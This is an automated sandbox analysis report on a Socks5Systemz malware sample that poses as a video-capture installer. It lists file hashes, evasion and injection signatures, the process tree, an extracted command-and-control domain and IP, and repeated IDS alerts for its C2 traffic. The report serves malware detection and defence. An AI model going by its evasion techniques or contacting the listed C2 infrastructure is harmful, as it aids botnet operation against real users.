Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AbC0LBkVhr.exe

Overview

General Information

Sample name:AbC0LBkVhr.exe
renamed because original name is a hash value
Original sample name:038c7d5697bfbe553717357809e621bf.exe
Analysis ID:1576106
MD5:038c7d5697bfbe553717357809e621bf
SHA1:1264a6bc374db430ce8007b99cc6b10ad0f14c9e
SHA256:71f8685ec48d0623886c9cf10bc1bc806586904c939aa28d20f9a253d45b623f
Tags:exeSocks5Systemzuser-abuse_ch
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • AbC0LBkVhr.exe (PID: 6888 cmdline: "C:\Users\user\Desktop\AbC0LBkVhr.exe" MD5: 038C7D5697BFBE553717357809E621BF)
    • AbC0LBkVhr.tmp (PID: 6932 cmdline: "C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp" /SL5="$20416,3526895,54272,C:\Users\user\Desktop\AbC0LBkVhr.exe" MD5: 2A520A4553D90F23218A97B9476D232A)
      • net.exe (PID: 7100 cmdline: "C:\Windows\system32\net.exe" pause video_capture_solution_11223 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 6196 cmdline: C:\Windows\system32\net1 pause video_capture_solution_11223 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • videocapturesolution32.exe (PID: 7156 cmdline: "C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe" -i MD5: F980DB1C4941DE93EA4A88045D20F6D5)
  • cleanup
{"C2 list": ["ejvphud.ua"]}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\ProgramData\EShineEncoder\EShineEncoder.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-3B09G.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
          00000004.00000000.1722687638.0000000000401000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            00000001.00000002.2974303192.0000000005A00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              00000004.00000002.2974350816.0000000002D09000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                Process Memory Space: videocapturesolution32.exe PID: 7156JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                  SourceRuleDescriptionAuthorStrings
                  4.0.videocapturesolution32.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-16T14:53:00.972080+010020494671A Network Trojan was detected192.168.2.449737147.45.126.3180TCP
                    2024-12-16T14:53:04.945392+010020494671A Network Trojan was detected192.168.2.449737147.45.126.3180TCP
                    2024-12-16T14:53:06.672139+010020494671A Network Trojan was detected192.168.2.449750147.45.126.3180TCP
                    2024-12-16T14:53:08.409471+010020494671A Network Trojan was detected192.168.2.449755147.45.126.3180TCP
                    2024-12-16T14:53:10.043993+010020494671A Network Trojan was detected192.168.2.449757147.45.126.3180TCP
                    2024-12-16T14:53:10.695596+010020494671A Network Trojan was detected192.168.2.449757147.45.126.3180TCP
                    2024-12-16T14:53:12.337893+010020494671A Network Trojan was detected192.168.2.449765147.45.126.3180TCP
                    2024-12-16T14:53:13.939702+010020494671A Network Trojan was detected192.168.2.449768147.45.126.3180TCP
                    2024-12-16T14:53:15.552173+010020494671A Network Trojan was detected192.168.2.449774147.45.126.3180TCP
                    2024-12-16T14:53:17.135660+010020494671A Network Trojan was detected192.168.2.449778147.45.126.3180TCP
                    2024-12-16T14:53:18.859616+010020494671A Network Trojan was detected192.168.2.449781147.45.126.3180TCP
                    2024-12-16T14:53:19.478454+010020494671A Network Trojan was detected192.168.2.449781147.45.126.3180TCP
                    2024-12-16T14:53:21.246296+010020494671A Network Trojan was detected192.168.2.449789147.45.126.3180TCP
                    2024-12-16T14:53:21.856324+010020494671A Network Trojan was detected192.168.2.449789147.45.126.3180TCP
                    2024-12-16T14:53:22.496373+010020494671A Network Trojan was detected192.168.2.449789147.45.126.3180TCP
                    2024-12-16T14:53:23.106741+010020494671A Network Trojan was detected192.168.2.449789147.45.126.3180TCP
                    2024-12-16T14:53:25.816329+010020494671A Network Trojan was detected192.168.2.449798147.45.126.3180TCP
                    2024-12-16T14:53:27.716440+010020494671A Network Trojan was detected192.168.2.449803147.45.126.3180TCP
                    2024-12-16T14:53:28.327002+010020494671A Network Trojan was detected192.168.2.449803147.45.126.3180TCP
                    2024-12-16T14:53:29.959132+010020494671A Network Trojan was detected192.168.2.449811147.45.126.3180TCP
                    2024-12-16T14:53:31.620468+010020494671A Network Trojan was detected192.168.2.449815147.45.126.3180TCP
                    2024-12-16T14:53:33.371099+010020494671A Network Trojan was detected192.168.2.449821147.45.126.3180TCP
                    2024-12-16T14:53:34.117261+010020494671A Network Trojan was detected192.168.2.449821147.45.126.3180TCP
                    2024-12-16T14:53:35.744506+010020494671A Network Trojan was detected192.168.2.449827147.45.126.3180TCP
                    2024-12-16T14:53:37.333697+010020494671A Network Trojan was detected192.168.2.449833147.45.126.3180TCP
                    2024-12-16T14:53:38.973303+010020494671A Network Trojan was detected192.168.2.449837147.45.126.3180TCP
                    2024-12-16T14:53:40.596098+010020494671A Network Trojan was detected192.168.2.449840147.45.126.3180TCP
                    2024-12-16T14:53:42.202730+010020494671A Network Trojan was detected192.168.2.449846147.45.126.3180TCP
                    2024-12-16T14:53:42.800414+010020494671A Network Trojan was detected192.168.2.449846147.45.126.3180TCP
                    2024-12-16T14:53:44.551366+010020494671A Network Trojan was detected192.168.2.449852147.45.126.3180TCP
                    2024-12-16T14:53:46.194494+010020494671A Network Trojan was detected192.168.2.449858147.45.126.3180TCP
                    2024-12-16T14:53:47.807861+010020494671A Network Trojan was detected192.168.2.449861147.45.126.3180TCP
                    2024-12-16T14:53:49.453296+010020494671A Network Trojan was detected192.168.2.449865147.45.126.3180TCP
                    2024-12-16T14:53:50.052934+010020494671A Network Trojan was detected192.168.2.449865147.45.126.3180TCP
                    2024-12-16T14:53:51.727399+010020494671A Network Trojan was detected192.168.2.449870147.45.126.3180TCP
                    2024-12-16T14:53:53.322584+010020494671A Network Trojan was detected192.168.2.449876147.45.126.3180TCP
                    2024-12-16T14:53:54.934871+010020494671A Network Trojan was detected192.168.2.449881147.45.126.3180TCP
                    2024-12-16T14:53:55.522260+010020494671A Network Trojan was detected192.168.2.449881147.45.126.3180TCP
                    2024-12-16T14:53:57.108278+010020494671A Network Trojan was detected192.168.2.449887147.45.126.3180TCP
                    2024-12-16T14:53:57.707007+010020494671A Network Trojan was detected192.168.2.449887147.45.126.3180TCP
                    2024-12-16T14:53:59.334096+010020494671A Network Trojan was detected192.168.2.449894147.45.126.3180TCP
                    2024-12-16T14:54:00.963510+010020494671A Network Trojan was detected192.168.2.449897147.45.126.3180TCP
                    2024-12-16T14:54:02.553198+010020494671A Network Trojan was detected192.168.2.449901147.45.126.3180TCP
                    2024-12-16T14:54:04.619418+010020494671A Network Trojan was detected192.168.2.449907147.45.126.3180TCP
                    2024-12-16T14:54:06.313221+010020494671A Network Trojan was detected192.168.2.449913147.45.126.3180TCP
                    2024-12-16T14:54:07.978534+010020494671A Network Trojan was detected192.168.2.449917147.45.126.3180TCP
                    2024-12-16T14:54:10.024480+010020494671A Network Trojan was detected192.168.2.449922147.45.126.3180TCP
                    2024-12-16T14:54:11.689372+010020494671A Network Trojan was detected192.168.2.449926147.45.126.3180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-16T14:53:00.972080+010020501121A Network Trojan was detected192.168.2.449737147.45.126.3180TCP
                    2024-12-16T14:53:04.945392+010020501121A Network Trojan was detected192.168.2.449737147.45.126.3180TCP
                    2024-12-16T14:53:06.672139+010020501121A Network Trojan was detected192.168.2.449750147.45.126.3180TCP
                    2024-12-16T14:53:08.409471+010020501121A Network Trojan was detected192.168.2.449755147.45.126.3180TCP
                    2024-12-16T14:53:10.043993+010020501121A Network Trojan was detected192.168.2.449757147.45.126.3180TCP
                    2024-12-16T14:53:10.695596+010020501121A Network Trojan was detected192.168.2.449757147.45.126.3180TCP
                    2024-12-16T14:53:12.337893+010020501121A Network Trojan was detected192.168.2.449765147.45.126.3180TCP
                    2024-12-16T14:53:13.939702+010020501121A Network Trojan was detected192.168.2.449768147.45.126.3180TCP
                    2024-12-16T14:53:15.552173+010020501121A Network Trojan was detected192.168.2.449774147.45.126.3180TCP
                    2024-12-16T14:53:17.135660+010020501121A Network Trojan was detected192.168.2.449778147.45.126.3180TCP
                    2024-12-16T14:53:18.859616+010020501121A Network Trojan was detected192.168.2.449781147.45.126.3180TCP
                    2024-12-16T14:53:19.478454+010020501121A Network Trojan was detected192.168.2.449781147.45.126.3180TCP
                    2024-12-16T14:53:21.246296+010020501121A Network Trojan was detected192.168.2.449789147.45.126.3180TCP
                    2024-12-16T14:53:21.856324+010020501121A Network Trojan was detected192.168.2.449789147.45.126.3180TCP
                    2024-12-16T14:53:22.496373+010020501121A Network Trojan was detected192.168.2.449789147.45.126.3180TCP
                    2024-12-16T14:53:23.106741+010020501121A Network Trojan was detected192.168.2.449789147.45.126.3180TCP
                    2024-12-16T14:53:25.816329+010020501121A Network Trojan was detected192.168.2.449798147.45.126.3180TCP
                    2024-12-16T14:53:27.716440+010020501121A Network Trojan was detected192.168.2.449803147.45.126.3180TCP
                    2024-12-16T14:53:28.327002+010020501121A Network Trojan was detected192.168.2.449803147.45.126.3180TCP
                    2024-12-16T14:53:29.959132+010020501121A Network Trojan was detected192.168.2.449811147.45.126.3180TCP
                    2024-12-16T14:53:31.620468+010020501121A Network Trojan was detected192.168.2.449815147.45.126.3180TCP
                    2024-12-16T14:53:33.371099+010020501121A Network Trojan was detected192.168.2.449821147.45.126.3180TCP
                    2024-12-16T14:53:34.117261+010020501121A Network Trojan was detected192.168.2.449821147.45.126.3180TCP
                    2024-12-16T14:53:35.744506+010020501121A Network Trojan was detected192.168.2.449827147.45.126.3180TCP
                    2024-12-16T14:53:37.333697+010020501121A Network Trojan was detected192.168.2.449833147.45.126.3180TCP
                    2024-12-16T14:53:38.973303+010020501121A Network Trojan was detected192.168.2.449837147.45.126.3180TCP
                    2024-12-16T14:53:40.596098+010020501121A Network Trojan was detected192.168.2.449840147.45.126.3180TCP
                    2024-12-16T14:53:42.202730+010020501121A Network Trojan was detected192.168.2.449846147.45.126.3180TCP
                    2024-12-16T14:53:42.800414+010020501121A Network Trojan was detected192.168.2.449846147.45.126.3180TCP
                    2024-12-16T14:53:44.551366+010020501121A Network Trojan was detected192.168.2.449852147.45.126.3180TCP
                    2024-12-16T14:53:46.194494+010020501121A Network Trojan was detected192.168.2.449858147.45.126.3180TCP
                    2024-12-16T14:53:47.807861+010020501121A Network Trojan was detected192.168.2.449861147.45.126.3180TCP
                    2024-12-16T14:53:49.453296+010020501121A Network Trojan was detected192.168.2.449865147.45.126.3180TCP
                    2024-12-16T14:53:50.052934+010020501121A Network Trojan was detected192.168.2.449865147.45.126.3180TCP
                    2024-12-16T14:53:51.727399+010020501121A Network Trojan was detected192.168.2.449870147.45.126.3180TCP
                    2024-12-16T14:53:53.322584+010020501121A Network Trojan was detected192.168.2.449876147.45.126.3180TCP
                    2024-12-16T14:53:54.934871+010020501121A Network Trojan was detected192.168.2.449881147.45.126.3180TCP
                    2024-12-16T14:53:55.522260+010020501121A Network Trojan was detected192.168.2.449881147.45.126.3180TCP
                    2024-12-16T14:53:57.108278+010020501121A Network Trojan was detected192.168.2.449887147.45.126.3180TCP
                    2024-12-16T14:53:57.707007+010020501121A Network Trojan was detected192.168.2.449887147.45.126.3180TCP
                    2024-12-16T14:53:59.334096+010020501121A Network Trojan was detected192.168.2.449894147.45.126.3180TCP
                    2024-12-16T14:54:00.963510+010020501121A Network Trojan was detected192.168.2.449897147.45.126.3180TCP
                    2024-12-16T14:54:02.553198+010020501121A Network Trojan was detected192.168.2.449901147.45.126.3180TCP
                    2024-12-16T14:54:04.619418+010020501121A Network Trojan was detected192.168.2.449907147.45.126.3180TCP
                    2024-12-16T14:54:06.313221+010020501121A Network Trojan was detected192.168.2.449913147.45.126.3180TCP
                    2024-12-16T14:54:07.978534+010020501121A Network Trojan was detected192.168.2.449917147.45.126.3180TCP
                    2024-12-16T14:54:10.024480+010020501121A Network Trojan was detected192.168.2.449922147.45.126.3180TCP
                    2024-12-16T14:54:11.689372+010020501121A Network Trojan was detected192.168.2.449926147.45.126.3180TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: videocapturesolution32.exe.7156.4.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["ejvphud.ua"]}
                    Source: C:\ProgramData\EShineEncoder\EShineEncoder.exeReversingLabs: Detection: 79%
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeReversingLabs: Detection: 79%
                    Source: AbC0LBkVhr.exeReversingLabs: Detection: 50%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\ProgramData\EShineEncoder\EShineEncoder.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0045CFA8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045CFA8
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0045D05C ArcFourCrypt,1_2_0045D05C
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0045D074 ArcFourCrypt,1_2_0045D074
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeUnpacked PE file: 4.2.videocapturesolution32.exe.400000.0.unpack
                    Source: AbC0LBkVhr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Video Capture Solution_is1Jump to behavior
                    Source: Binary string: msvcp71.pdbx# source: is-297HU.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-MJRUC.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-297HU.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-GSMNO.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-MJRUC.tmp.1.dr
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00452A34 FindFirstFileA,GetLastError,1_2_00452A34
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00474D70 FindFirstFileA,FindNextFileA,FindClose,1_2_00474D70
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00462578 FindFirstFileA,FindNextFileA,FindClose,1_2_00462578
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004975B0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004975B0
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00463B04 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463B04
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00463F80 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463F80

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49737 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49737 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49755 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49755 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49750 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49750 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49757 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49757 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49765 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49811 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49811 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49774 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49774 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49768 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49768 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49852 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49852 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49789 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49789 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49821 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49815 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49865 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49865 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49765 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49846 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49846 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49821 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49815 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49870 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49870 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49907 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49907 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49858 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49897 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49897 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49876 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49827 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49827 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49858 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49887 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49887 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49840 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49840 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49798 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49901 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49901 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49781 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49876 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49913 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49913 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49837 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49837 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49917 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49781 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49917 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49926 -> 147.45.126.31:80
